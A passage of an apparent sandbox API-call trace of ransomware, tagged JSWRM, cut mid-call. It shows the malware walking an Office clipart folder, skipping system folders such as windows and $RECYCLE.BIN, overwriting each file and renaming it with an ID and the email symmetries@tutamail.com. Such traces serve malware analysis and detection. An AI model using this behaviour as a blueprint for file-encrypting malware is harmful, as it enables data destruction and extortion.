lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0082.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.130] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10852) returned 1 [0082.130] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a60) returned 0x24d210 [0082.130] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2a60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2a60, lpOverlapped=0x0) returned 1 [0082.132] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.132] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2a60, lpOverlapped=0x0) returned 1 [0082.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.132] CloseHandle (hObject=0x314) returned 1 [0082.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0082.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0082.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0082.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0082.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0082.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0082.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0082.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0082.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.133] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0082.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0082.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0082.134] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c18, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107316.WMF", cAlternateFileName="")) returned 1 [0082.134] lstrcmpiW (lpString1="J0107316.WMF", lpString2=".") returned 1 [0082.134] lstrcmpiW (lpString1="J0107316.WMF", lpString2="..") returned 1 [0082.134] lstrcmpiW (lpString1="J0107316.WMF", lpString2="...") returned 1 [0082.134] lstrcmpiW (lpString1="J0107316.WMF", lpString2="windows") returned -1 [0082.134] lstrcmpiW (lpString1="J0107316.WMF", lpString2="recovery") returned -1 [0082.134] lstrcmpiW (lpString1="J0107316.WMF", lpString2="perflogs") returned -1 [0082.134] lstrcmpiW (lpString1="J0107316.WMF", lpString2="documents and settings") returned 1 [0082.134] lstrcmpiW (lpString1="J0107316.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.134] lstrcmpiW (lpString1="J0107316.WMF", lpString2="system volume information") returned -1 [0082.134] lstrcmpiW (lpString1="J0107316.WMF", lpString2="msocache") returned -1 [0082.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0082.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107316.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107316.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107316.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0082.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0082.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107316.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107316.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107316.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0082.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0082.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.135] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11288) returned 1 [0082.135] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c10) returned 0x24d210 [0082.135] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2c10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2c10, lpOverlapped=0x0) returned 1 [0082.137] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.137] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2c10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2c10, lpOverlapped=0x0) returned 1 [0082.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.137] CloseHandle (hObject=0x314) returned 1 [0082.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0082.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0082.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0082.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0082.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0082.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0082.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.137] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0082.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0082.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.138] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1984, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107328.WMF", cAlternateFileName="")) returned 1 [0082.138] lstrcmpiW (lpString1="J0107328.WMF", lpString2=".") returned 1 [0082.138] lstrcmpiW (lpString1="J0107328.WMF", lpString2="..") returned 1 [0082.138] lstrcmpiW (lpString1="J0107328.WMF", lpString2="...") returned 1 [0082.138] lstrcmpiW (lpString1="J0107328.WMF", lpString2="windows") returned -1 [0082.138] lstrcmpiW (lpString1="J0107328.WMF", lpString2="recovery") returned -1 [0082.138] lstrcmpiW (lpString1="J0107328.WMF", lpString2="perflogs") returned -1 [0082.138] lstrcmpiW (lpString1="J0107328.WMF", lpString2="documents and settings") returned 1 [0082.139] lstrcmpiW (lpString1="J0107328.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.139] lstrcmpiW (lpString1="J0107328.WMF", lpString2="system volume information") returned -1 [0082.139] lstrcmpiW (lpString1="J0107328.WMF", lpString2="msocache") returned -1 [0082.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0082.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107328.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107328.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107328.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0082.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0082.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107328.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107328.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107328.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0082.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0082.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.139] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6532) returned 1 [0082.139] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1980) returned 0x205850 [0082.139] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1980, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1980, lpOverlapped=0x0) returned 1 [0082.141] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.141] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1980, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1980, lpOverlapped=0x0) returned 1 [0082.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.141] CloseHandle (hObject=0x314) returned 1 [0082.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0082.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0082.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0082.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0082.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0082.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0082.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0082.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0082.142] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0082.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0082.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0082.143] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1094, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107342.WMF", cAlternateFileName="")) returned 1 [0082.143] lstrcmpiW (lpString1="J0107342.WMF", lpString2=".") returned 1 [0082.143] lstrcmpiW (lpString1="J0107342.WMF", lpString2="..") returned 1 [0082.143] lstrcmpiW (lpString1="J0107342.WMF", lpString2="...") returned 1 [0082.143] lstrcmpiW (lpString1="J0107342.WMF", lpString2="windows") returned -1 [0082.143] lstrcmpiW (lpString1="J0107342.WMF", lpString2="recovery") returned -1 [0082.143] lstrcmpiW (lpString1="J0107342.WMF", lpString2="perflogs") returned -1 [0082.143] lstrcmpiW (lpString1="J0107342.WMF", lpString2="documents and settings") returned 1 [0082.143] lstrcmpiW (lpString1="J0107342.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.143] lstrcmpiW (lpString1="J0107342.WMF", lpString2="system volume information") returned -1 [0082.143] lstrcmpiW (lpString1="J0107342.WMF", lpString2="msocache") returned -1 [0082.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0082.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107342.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107342.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107342.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0082.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0082.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107342.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107342.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107342.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0082.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0082.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0082.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.144] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4244) returned 1 [0082.144] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1090) returned 0x23fc98 [0082.144] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1090, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1090, lpOverlapped=0x0) returned 1 [0082.145] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.146] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1090, lpOverlapped=0x0) returned 1 [0082.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0082.146] CloseHandle (hObject=0x314) returned 1 [0082.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0082.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | 